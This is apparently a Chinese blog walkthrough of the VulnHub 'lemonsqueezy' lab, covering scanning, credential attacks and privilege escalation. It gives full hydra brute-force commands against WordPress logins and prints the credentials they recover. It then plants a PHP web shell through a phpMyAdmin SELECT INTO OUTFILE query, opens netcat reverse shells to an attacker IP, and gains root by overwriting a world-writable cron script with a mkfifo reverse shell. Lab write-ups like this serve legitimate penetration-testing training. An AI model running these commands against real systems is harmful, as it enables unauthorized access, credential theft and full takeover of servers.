当前位置: 首页 > article >正文

vulnhub(15):lemonsqueezy(hydra爆破、计划任务提权)

端口

nmap -Pn -p- 192.168.72.173
​
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:B8:2D:FC (VMware)

打点

80端口

主页面是apache2的默认页面,没有robots.txt,我们直接扫描目录

gobuster dir -u http://192.168.72.173/ -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html --add-slash 
​
/manual/              (Status: 200) [Size: 626]
/wordpress/           (Status: 200) [Size: 52276]
/javascript/          (Status: 403) [Size: 279]
/phpmyadmin/          (Status: 200) [Size: 10531]

发现wordpress之后,查看wordpress主页

主页翻了翻,没有什么敏感信息,尝试hydra爆破

hydra爆破

burp抓包保存请求头到raj文件中,raj文件如下

Host: lemonsqueezy
User-Agent: Mozilla/5.0 (Hydra Proxy)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://lemonsqueezy/wordpress/wp-login.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://lemonsqueezy
Connection: close
Cookie: wordpress_test_cookie=WP+Cookie+check
Upgrade-Insecure-Requests: 1

写python脚本,将数据包中的信息转成hydra命令

file_array = []
​
file = input(str())
​
with open(file,"r") as f:
    for line in f:
        file_array.append(":H=" + line.strip().replace(":","\\:"))
​
header=""
​
for line in file_array:
    header += line
    print(line)
print(header)

结果

:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate:H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109:H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1

hydra爆破用户名

hydra -L /usr/share/wordlists/SecLists-master/Usernames/top-usernames-shortlist.txt -p 123 lemonsqueezy http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flemonsqueezy%2Fwordpress%2Fwp-admin%2F&testcookie=1:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate
:H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109
:H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1:Invalid"
​
结果爆破出两个用户,保存到usernames.txt文件:
lemon
orange

hydra爆破密码

hydra -L usernames.txt -P /usr/share/wordlists/SecLists-master/Passwords/500-worst-passwords.txt lemonsqueezy http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2Flemonsqueezy%2Fwordpress%2Fwp-admin%2F&testcookie=1:H=Host\: lemonsqueezy:H=User-Agent\: Mozilla/5.0 (Hydra Proxy):H=Accept\: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8:H=Accept-Language\: en-US,en;q=0.5:H=Accept-Encoding\: gzip, deflate
:H=Referer\: http\://lemonsqueezy/wordpress/wp-login.php:H=Content-Type\: application/x-www-form-urlencoded:H=Content-Length\: 109
:H=Origin\: http\://lemonsqueezy:H=Connection\: close:H=Cookie\: wordpress_test_cookie=WP+Cookie+check:H=Upgrade-Insecure-Requests\: 1:incorrect"
​
爆破出密码:
[80][http-post-form] host: lemonsqueezy   login: orange   password: ginger
登陆后台

看到一个敏感信息,在以Keep this safe!为标题的post下的内容如下

n0t1n@w0rdl1st!
登录phpmyadmin
orange
n0t1n@w0rdl1st!
sql语句上传木马
select "<?php system($_GET['a'])?>" into outfile "/var/www/html/wordpress/1.php"
反弹shell
http://lemonsqueezy/wordpress/1.php?a=nc 192.168.72.162 1234 -e /bin/bash

提权

crontab
运行了如下脚本
*/2 *   * * *   root    /etc/logrotate.d/logrotate
​
此外这个脚本是777权限
反弹shell覆盖此文件
echo "mkfifo /tmp/f; nc 192.168.72.162 223 </tmp/f | bash > /tmp/f 2>&1;rm -rf /tmp/f" > /etc/logrotate.d/logrotate
​
攻击主机监听:
nc -nvlp 223
root
[listening on [any] 223 ...
connect to [192.168.72.162] from (UNKNOWN) [192.168.72.173] 59534
id
uid=0(root) gid=0(root) groups=0(root)
whoami
root
cd /root
ls
root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=]()

http://www.kler.cn/news/356121.html

相关文章:

  • Vue是一套构建用户界面的渐进式框架,常用于构建单页面应用
  • OpenCV高级图形用户界面(7)获取指定窗口的属性值函数getWindowProperty()的使用
  • 十二、结构型(代理模式)
  • 雷达液位计在污水测量中的应用与优势
  • sentinel原理源码分析系列(四)-ContextEntry
  • Python爬虫进阶:高效数据采集的艺术
  • MySQL-10.DML-添加数据insert
  • 机器视觉入门基础相关概念一 ——单目相机模型
  • 高级java每日一道面试题-2024年10月18日-数据库篇[Redis篇]-一个Redis实例最多能存放多少的keys?
  • OpenWRT 和 Padavan 路由器配置网络打印机 实现远程打印
  • 【从技术到营销的跨界成长】技术人的营销心法与成长秘诀
  • Git_GitHub
  • JavaScript 第19章:Web Storage
  • 什么是堡垒机?安全为什么需要堡垒机?
  • 设计模式-模板方法
  • SQL基础练习题三
  • 极氪汽车困局:营销频繁车、产品力不足
  • 群晖通过 Docker 安装 MySQL
  • 文心一言帮程序员干活:请帮我写出数字1到50的英文
  • Linux C语言 进程详解——fork()/wait()/waitpid()